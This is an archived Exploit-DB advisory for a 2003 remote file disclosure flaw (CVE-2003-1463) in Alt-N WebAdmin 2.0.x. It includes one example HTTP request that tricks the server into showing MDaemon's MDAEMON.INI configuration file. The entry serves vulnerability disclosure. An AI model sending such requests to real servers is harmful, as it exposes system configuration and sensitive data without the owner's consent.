Alt-N WebAdmin 2.0.x - Remote File Disclosure Vulnerability

2003-04-25T00:00:00
ID EDB-ID:22542
Type exploitdb
Reporter david@kamborio.net
Modified 2003-04-25T00:00:00

Description

Alt-N WebAdmin 2.0.x Remote File Disclosure Vulnerability. CVE-2003-1463. Remote exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/7439/info

Reportedly, remote users can discover the installation directory of certain software on the underlying system by submitting an HTTP request to the WebAdmin server. This could allow an attacker to obtain sensitive information.

http://www.example.com/WebAdmin.dll?session=X&Program=MDaemon&Directory:Name=C:\MDaemon\App&File:Name=MDAEMON.INI&View=EditFile